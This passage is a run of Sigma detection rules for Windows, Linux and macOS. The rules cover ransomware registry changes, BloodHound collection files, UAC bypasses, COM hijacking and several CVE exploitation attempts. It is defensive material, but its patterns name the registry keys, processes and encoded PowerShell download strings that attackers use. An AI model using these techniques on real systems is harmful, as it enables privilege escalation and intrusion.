    - https://linux.die.net/man/1/truncate
    - https://linux.die.net/man/1/dd
author: 'Igor Fits, Mikhail Larin, oscd.community'
date: 2020-10-19
modified: 2023-02-17
tags:
    - attack.stealth
    - attack.t1027.001
logsource:
    product: macos
    category: process_creation
detection:
    selection_truncate:
        Image|endswith: '/truncate'
        CommandLine|contains: '-s +'
    selection_dd:
        Image|endswith: '/dd'
        CommandLine|contains:
            - 'if=/dev/zero' # if input is not /dev/zero, then there is no null padding
            - 'if=/dev/random' # high-quality random data
            - 'if=/dev/urandom' # low-quality random data
    condition: 1 of selection_*
falsepositives:
    - Legitimate script work
level: high

title: Blackbyte Ransomware Registry
id: 83314318-052a-4c90-a1ad-660ece38d276
status: test
description: |
    Detects specific windows registry modifications made by BlackByte ransomware variants.
    BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption.
    This rule triggers when any of the following registry keys are set to DWORD 1, however all three should be investigated as part of a larger BlackByte ransomware detection and response effort.
references:
    - https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/
author: frack113
date: 2022-01-24
modified: 2025-10-21
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
    - detection.emerging-threats
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject:
            - 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy'
            - 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections'
            - 'HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\LongPathsEnabled'
        Details: 'DWORD (0x00000001)'
    condition: selection
falsepositives:
    - Unknown
level: high

title: BloodHound Collection Files
id: 02773bed-83bf-469f-b7ff-e676e7d78bab
status: test
description: Detects default file names outputted by the BloodHound collection tool SharpHound
references:
    - https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection
author: C.J. May
date: 2022-08-09
modified: 2026-02-19
tags:
    - attack.discovery
    - attack.t1087.001
    - attack.t1087.002
    - attack.t1482
    - attack.t1069.001
    - attack.t1069.002
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|endswith:
            - 'BloodHound.zip'
            - '_computers.json'
            - '_containers.json'
            # - '_domains.json'  # prone to false positives with ProbabilisticRevealTokenRegistry function in Google Chrome
            - '_gpos.json'
            - '_groups.json'
            - '_ous.json'
            - '_users.json'
    filter_optional_ms_winapps:
        Image|endswith: '\svchost.exe'
        TargetFilename|startswith: 'C:\Program Files\WindowsApps\Microsoft.'
        TargetFilename|endswith: '\pocket_containers.json'
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise
level: high

title: Blue Mockingbird
id: c3198a27-23a0-4c2c-af19-e5328d49680e
related:
    - id: ce239692-aa94-41b3-b32f-9cab259c96ea
      type: merged
status: test
description: Attempts to detect system changes made by Blue Mockingbird
references:
    - https://redcanary.com/blog/blue-mockingbird-cryptominer/
author: Trent Liffick (@tliffick)
date: 2020-05-14
modified: 2022-10-09
tags:
    - attack.persistence
    - attack.execution
    - attack.defense-impairment
    - attack.t1112
    - attack.t1047
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    sc_cmd:
        Image|endswith: '\cmd.exe'
        CommandLine|contains|all:
            - 'sc config'
            - 'wercplsupporte.dll'
    wmic_cmd:
        Image|endswith: '\wmic.exe'
        CommandLine|endswith: 'COR_PROFILER'
    condition: sc_cmd or wmic_cmd
falsepositives:
    - Unknown
level: high

title: Blue Mockingbird - Registry
id: 92b0b372-a939-44ed-a11b-5136cf680e27
related:
    - id: c3198a27-23a0-4c2c-af19-e5328d49680e
      type: derived
status: test
description: Attempts to detect system changes made by Blue Mockingbird
references:
    - https://redcanary.com/blog/blue-mockingbird-cryptominer/
author: Trent Liffick (@tliffick)
date: 2020-05-14
modified: 2023-08-17
tags:
    - attack.execution
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
    - attack.t1047
    - detection.emerging-threats
logsource:
    product: windows
    category: registry_set
detection:
    selection:
        TargetObject|endswith: '\CurrentControlSet\Services\wercplsupport\Parameters\ServiceDll'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Bypass UAC Using DelegateExecute
id: 46dd5308-4572-4d12-aa43-8938f0184d4f
status: test
description: Bypasses User Account Control using a fileless method
references:
    - https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand
    - https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute
author: frack113
date: 2022-01-05
modified: 2023-08-17
tags:
    - attack.privilege-escalation
    - attack.t1548.002
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith: '\open\command\DelegateExecute'
        Details: (Empty)
    condition: selection
falsepositives:
    - Unknown
level: high
regression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/info.yml
simulation:
    - type: atomic-red-team
      name: Bypass UAC using sdclt DelegateExecute
      technique: T1548.002
      atomic_guid: 3be891eb-4608-4173-87e8-78b494c029b7

title: Bypass UAC Using Event Viewer
id: 674202d0-b22a-4af4-ae5f-2eda1f3da1af
status: test
description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification
references:
    - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd
author: frack113
date: 2022-01-05
modified: 2023-08-17
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1547.010
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith: '_Classes\mscfile\shell\open\command\(Default)'
    filter:
        Details|startswith: '%SystemRoot%\system32\mmc.exe "%1" %'
    condition: selection and not filter
falsepositives:
    - Unknown
level: high
regression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/info.yml
simulation:
    - type: atomic-red-team
      name: Bypass UAC using Event Viewer (cmd)
      technique: T1548.002
      atomic_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9

title: Bypass UAC Using SilentCleanup Task
id: 724ea201-6514-4f38-9739-e5973c34f49a
status: test
description: |
    Detects the setting of the environement variable "windir" to a non default value.
    Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task.
    The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task
    - https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
    - https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign
author: frack113, Nextron Systems
date: 2022-01-06
modified: 2024-01-30
tags:
    - attack.privilege-escalation
    - attack.t1548.002
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith: '\Environment\windir'
    filter_main_default:
        Details: '%SystemRoot%'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: high
regression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/info.yml
simulation:
    - type: atomic-red-team
      name: Bypass UAC using SilentCleanup Task
      technique: T1548.002
      atomic_guid: 28104f8a-4ff1-4582-bcf6-699dce156608

title: Bypass UAC via Fodhelper.exe
id: 7f741dcf-fc22-4759-87b4-9ae8376676a2
status: test
description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.
references:
    - https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md
author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community
date: 2019-10-24
modified: 2021-11-27
tags:
    - attack.privilege-escalation
    - attack.t1548.002
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\fodhelper.exe'
    condition: selection
falsepositives:
    - Legitimate use of fodhelper.exe utility by legitimate user
level: high

title: CMSTP Execution Process Creation
id: 7d4cdc5a-0076-40ca-aac8-f7e714570e47
status: stable
description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
references:
    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
author: Nik Seetharaman
date: 2018-07-16
modified: 2020-12-23
tags:
    - attack.execution
    - attack.stealth
    - attack.t1218.003
    - attack.g0069
    - car.2019-04-001
logsource:
    category: process_creation
    product: windows
detection:
    # CMSTP Spawning Child Process
    selection:
        ParentImage|endswith: '\cmstp.exe'
    condition: selection
falsepositives:
    - Legitimate CMSTP use (unlikely in modern enterprise environments)
level: high

title: CMSTP Execution Registry Event
id: b6d235fc-1d38-4b12-adbe-325f06728f37
status: stable
description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
references:
    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
author: Nik Seetharaman
date: 2018-07-16
modified: 2020-12-23
tags:
    - attack.execution
    - attack.stealth
    - attack.t1218.003
    - attack.g0069
    - car.2019-04-001
logsource:
    category: registry_event
    product: windows
detection:
    selection:
        TargetObject|contains: '\cmmgr32.exe'
    condition: selection
falsepositives:
    - Legitimate CMSTP use (unlikely in modern enterprise environments)
level: high

title: CMSTP UAC Bypass via COM Object Access
id: 4b60e6f2-bf39-47b4-b4ea-398e33cfe253
status: stable
description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
references:
    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
    - https://twitter.com/hFireF0X/status/897640081053364225
    - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf
    - https://github.com/hfiref0x/UACME
author: Nik Seetharaman, Christian Burkard (Nextron Systems)
date: 2019-07-31
modified: 2024-12-01
tags:
    - attack.execution
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1548.002
    - attack.t1218.003
    - attack.g0069
    - car.2019-04-001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\DllHost.exe'
        ParentCommandLine|contains:
            - ' /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' # cmstplua.dll
            - ' /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}' # CMLUAUTIL
            - ' /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}' # EditionUpgradeManagerObj.dll
            - ' /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}' # colorui.dll
            - ' /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}' # wscui.cpl
        IntegrityLevel:
            - 'High'
            - 'System'
            - 'S-1-16-16384' # System
            - 'S-1-16-12288' # High
    condition: selection
falsepositives:
    - Legitimate CMSTP use (unlikely in modern enterprise environments)
level: high

title: COLDSTEEL RAT Anonymous User Process Execution
id: e01b6eb5-1eb4-4465-a165-85d40d874add
status: test
description: Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL
references:
    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-30
tags:
    - attack.persistence
    - detection.emerging-threats
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|contains:
            - '\Windows\System32\'
            - '\AppData\'
        User|contains: 'ANONYMOUS'
    condition: selection
falsepositives:
    - Unknown
level: high

title: COM Hijack via Sdclt
id: 07743f65-7ec9-404a-a519-913db7118a8d
status: test
description: Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'
references:
    - http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass
    - https://www.exploit-db.com/exploits/47696
author: Omkar Gudhate
date: 2020-09-27
modified: 2023-09-28
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1546
    - attack.t1548
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\Software\Classes\Folder\shell\open\command\DelegateExecute'
    condition: selection
falsepositives:
    - Unknown
level: high

title: COM Object Hijacking Via Modification Of Default System CLSID Default Value
id: 790317c0-0a36-4a6a-a105-6e576bf99a14
related:
    - id: 3d968d17-ffa4-4bc0-bfdc-f139de76ce77
      type: obsolete
    - id: a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12
      type: obsolete
status: experimental
description: Detects potential COM object hijacking via modification of default system CLSID.
references:
    - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)
    - https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/
    - https://blog.talosintelligence.com/uat-5647-romcom/
    - https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/darkhotel-a-cluster-of-groups-united-by-common-techniques
    - https://threatbook.io/blog/Analysis-of-APT-C-60-Attack-on-South-Korea
    - https://catalyst.prodaft.com/public/report/inside-the-latest-espionage-campaign-of-nebulous-mantis
    - https://github.com/rtecCyberSec/BitlockMove
    - https://cert.gov.ua/article/6284080
    - https://securelist.com/forumtroll-apt-hacking-team-dante-spyware/117851/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2024-07-16
modified: 2025-11-10
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546.015
logsource:
    category: registry_set
    product: windows
detection:
    selection_target_root:
        TargetObject|contains: '\CLSID\'
        TargetObject|endswith:
            - '\InprocServer32\(Default)'
            - '\LocalServer32\(Default)'
    selection_target_builtin_clsid:
        TargetObject|contains:
            # Note: Add other legitimate CLSID
            - '\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\'
            - '\{2155fee3-2419-4373-b102-6843707eb41f}\'
            - '\{4590f811-1d3a-11d0-891f-00aa004b2e24}\'
            - '\{4de225bf-cf59-4cfc-85f7-68b90f185355}\'
            - '\{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea}\'
            - '\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}\'
            - '\{F82B4EF1-93A9-4DDE-8015-F7950A1A6E31}\'
            - '\{7849596a-48ea-486e-8937-a2a3009f31a9}\'
            - '\{0b91a74b-ad7c-4a9d-b563-29eef9167172}\'
            - '\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\'
            - '\{30D49246-D217-465F-B00B-AC9DDD652EB7}\'
            - '\{A7A63E5C-3877-4840-8727-C1EA9D7A4D50}\'
            - '\{2227A280-3AEA-1069-A2DE-08002B30309D}\'
            - '\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}\'
            - '\{AA509086-5Ca9-4C25-8F95-589D3C07B48A}\'
    selection_susp_location_1:
        Details|contains:
            # Note: Add more suspicious paths and locations
            - ':\Perflogs\'
            - '\AppData\Local\'
            - '\Desktop\'
            - '\Downloads\'
            - '\Microsoft\Windows\Start Menu\Programs\Startup\'
            - '\System32\spool\drivers\color\' # as seen in the knotweed blog
            - '\Temporary Internet'
            - '\Users\Public\'
            - '\Windows\Temp\'
            - '%appdata%'
            - '%temp%'
            - '%tmp%'
    selection_susp_location_2:
        - Details|contains|all:
              - ':\Users\'
              - '\Favorites\'
        - Details|contains|all:
              - ':\Users\'
              - '\Favourites\'
        - Details|contains|all:
              - ':\Users\'
              - '\Contacts\'
        - Details|contains|all:
              - ':\Users\'
              - '\Pictures\'
    condition: all of selection_target_* and 1 of selection_susp_location_*
falsepositives:
    - Unlikely
level: high

title: CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry
id: 7ec912f2-5175-4868-b811-ec13ad0f8567
status: test
description: |
    Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension.
    This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.
references:
    - https://windows-internals.com/printdemon-cve-2020-1048/
author: EagleEye Team, Florian Roth (Nextron Systems), NVISO
date: 2020-05-13
modified: 2024-03-25
tags:
    - attack.persistence
    - attack.execution
    - attack.defense-impairment
    - attack.t1112
    - cve.2020-1048
    - detection.emerging-threats
logsource:
    product: windows
    category: registry_set
detection:
    selection:
        TargetObject|contains: '\Microsoft\Windows NT\CurrentVersion\Ports'
        Details|contains:
            - '.bat'
            - '.com'
            - '.dll'
            - '.exe'
            - '.ps1'
            - '.vbe'
            - '.vbs'
            - 'C:'
    condition: selection
falsepositives:
    - New printer port install on host
level: high

title: CVE-2021-26858 Exchange Exploitation
id: b06335b3-55ac-4b41-937e-16b7f5d57dfd
status: test
description: |
    Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for
    creation of non-standard files on disk by Exchange Server’s Unified Messaging service
    which could indicate dropping web shells or other malicious content
references:
    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
author: Bhabesh Raj
date: 2021-03-03
modified: 2022-10-09
tags:
    - attack.t1203
    - attack.execution
    - cve.2021-26858
    - detection.emerging-threats
logsource:
    category: file_event
    product: windows
detection:
    selection:
        Image|endswith: 'UMWorkerProcess.exe'
    filter:
        TargetFilename|endswith:
            - 'CacheCleanup.bin'
            - '.txt'
            - '.LOG'
            - '.cfg'
            - 'cleanup.bin'
    condition: selection and not filter
falsepositives:
    - Unknown
level: high

title: CVE-2021-44077 POC Default Dropped File
id: 7b501acf-fa98-4272-aa39-194f82edc8a3
status: test
description: Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)
references:
    - https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/
    - https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-06
tags:
    - attack.execution
    - cve.2021-44077
    - detection.emerging-threats
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith: '\ManageEngine\SupportCenterPlus\bin\msiexec.exe'
    condition: selection
falsepositives:
    - Unlikely
level: high

title: CVE-2022-24527 Microsoft Connected Cache LPE
id: e0a41412-c69a-446f-8e6e-0e6d7483dad7
status: test
description: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache
references:
    - https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/
author: Florian Roth (Nextron Systems)
date: 2022-04-13
tags:
    - attack.execution
    - attack.privilege-escalation
    - attack.t1059.001
    - cve.2022-24527
    - detection.emerging-threats
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith: 'WindowsPowerShell\Modules\webAdministration\webAdministration.psm1'
    filter:
        User|contains: # covers many language settings
            - 'AUTHORI'
            - 'AUTORI'
    condition: selection and not filter
falsepositives:
    - Unknown
level: high

title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
id: f8987c03-4290-4c96-870f-55e75ee377f4
related:
    - id: 1ddaa9a4-eb0b-4398-a9fe-7b018f9e23db
      type: similar
status: test
description: |
    Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
references:
    - https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html
    - https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment
    - https://github.com/ForceFledgling/CVE-2023-22518
author: Andreas Braathen (mnemonic.io)
date: 2023-11-14
tags:
    - attack.execution
    - attack.t1059
    - attack.initial-access
    - attack.t1190
    - cve.2023-22518
    - detection.emerging-threats
logsource:
    category: process_creation
    product: linux
detection:
    selection_parent:
        ParentImage|endswith: '/java'
        ParentCommandLine|contains: 'confluence'
    selection_child:
        # Only children associated with known campaigns
        Image|endswith:
            - '/bash'
            - '/curl'
            - '/echo'
            - '/wget'
    filter_main_ulimit:
        CommandLine|contains: 'ulimit -u'
    condition: all of selection_* and not 1 of filter_main_*
falsepositives:
    - Unlikely
level: high

title: CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File
id: e4556676-fc5c-4e95-8c39-5ef27791541f
related:
    - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343
      type: similar
status: test
description: Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331
references:
    - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
    - https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-08-30
tags:
    - attack.execution
    - cve.2023-38331
    - detection.emerging-threats
logsource:
    category: file_event
    product: windows
detection:
    selection:
        Image|endswith: '\WinRAR.exe'
        TargetFilename|contains: '\AppData\Local\Temp\Rar$'
        TargetFilename|re: '\.[a-zA-Z0-9]{1,4} \.'
    condition: selection
falsepositives:
    - Unknown
level: high

title: CVE-2024-50623 Exploitation Attempt - Cleo
id: f007b877-02e3-45b7-8501-1b78c2864029
status: experimental
description: |
    Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline.
references:
    - https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild
author: Tanner Filip, Austin Worline, Chad Hudson, Matt Anderson
date: 2024-12-09
tags:
    - attack.initial-access
    - attack.execution
    - attack.t1190
    - cve.2024-50623
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\javaw.exe'
        ParentCommandLine|contains:
            - 'Harmony'
            - 'lexicom'
            - 'VersaLex'
            - 'VLTrader'
        Image|endswith: '\cmd.exe'
        CommandLine|contains:
            - 'powershell'
            - ' -enc '
            - ' -EncodedCommand'
            - '.Download'
    condition: selection
falsepositives:
    - Unlikely
level: high

title: Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths
id: c74c0390-3e20-41fd-a69a-128f0275a5ea
related:
    - id: 59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9
      type: derived
status: test
description: |
    Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.
references:
    - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html
    - https://www.echotrail.io/insights/search/wusa.exe/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-05
modified: 2023-11-28
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection_root:
        Image|endswith: '\wusa.exe'
        CommandLine|contains: '/extract:'
    selection_paths:
        CommandLine|contains:
            - ':\PerfLogs\'
            - ':\Users\Public\'
            - ':\Windows\Temp\'
            - '\Appdata\Local\Temp\'
            # - '\Desktop\'
            # - '\Downloads\'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high

title: Capsh Shell Invocation - Linux
id: db1ac3be-f606-4e3a-89e0-9607cbe6b98a
status: test
description: |
    Detects the use of the "capsh" utility to invoke a shell.
references:
    - https://gtfobins.github.io/gtfobins/capsh/#shell
    - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
date: 2024-09-02
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith: '/capsh'
        CommandLine|endswith: ' --'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Change User Account Associated with the FAX Service
id: e3fdf743-f05b-4051-990a-b66919be1743
status: test
description: Detect change of the user account associated with the FAX service to avoid the escalation problem.
references:
    - https://twitter.com/dottor_morte/status/1544652325570191361
    - https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf
author: frack113
date: 2022-07-17
modified: 2022-12-30
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
logsource:
    product: windows
    category: registry_set
detection:
    selection:
        TargetObject: HKLM\System\CurrentControlSet\Services\Fax\ObjectName
    filter:
        Details|contains: NetworkService
    condition: selection and not filter
falsepositives:
    - Unknown
level: high